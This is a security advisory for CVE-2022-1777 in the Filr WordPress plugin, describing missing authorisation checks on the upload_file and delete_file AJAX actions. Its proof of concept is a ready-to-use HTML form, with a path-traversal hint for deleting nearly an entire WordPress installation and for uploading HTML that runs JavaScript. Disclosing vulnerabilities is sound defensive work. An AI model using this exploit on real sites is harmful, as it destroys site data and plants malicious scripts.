Filr – Secure Document Library < 1.2.2.1 – Subscriber+ AJAX Calls | CVE 2022-1777

Description

The plugin does not have authorisation check in two of its AJAX actions, allowing them to be called by any authenticated users, such as subscriber. They are are protected with a nonce, however the nonce is leaked on the dashboard. This could allow them to upload arbitrary HTML files as well as delete all files or arbitrary ones.

Proof of Concept

Affected AJAX actions: upload_file and delete_file. To get the nonce, search for uploader_nonce in the dashboard.

The following actions can be triggered with any authenticated user. All listed actions were triggered with a subscriber account.

1. Restricted file upload.

It is possible to upload files without htaccess or any valid php extension. This means it it possible to upload html files. Those html files can be used to execute malicious javascript.

2. Data deletion over upload process

The upload function contains a bug, which allows to delete every file ( excluding directories and files with a leading dot ), which can be deleted by the executing user ( in my case www-data ). This bug can be used to delete nearly a whole wp installation. ( blank directory structure will remain ) 

3. Direct files deletion

The delete_file function can be used to obtains identical results as described in 2.

You can use the following html form:

<form action="<your host here>/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
<input type="text" name="action" value="" placeholder="upload_file or delete_file">
<input type="text" name="nonce" value="" placeholder="your nonce here">

<!--
use post_id values to create a directory. Dont use it for path traversal, if you want to successful upload a file. To wipe nearly the entire installation use eg. ../../../../../../../../../../
The uploaded file will be stored inside the directory specified in post_id.
-->
<input type="text" name="post_id" value="" placeholder="">

<!--
Your html file.
-->
<input type="file"  name="file-upload" value="upload">

<!-- the following element is used for the delete_file function call. -->
<!-- before unlink is called a file_exists check is performed. -->
<input type="text" name="filename" placeholder="valid target file" >

<input type="submit" value="submit" >

</form>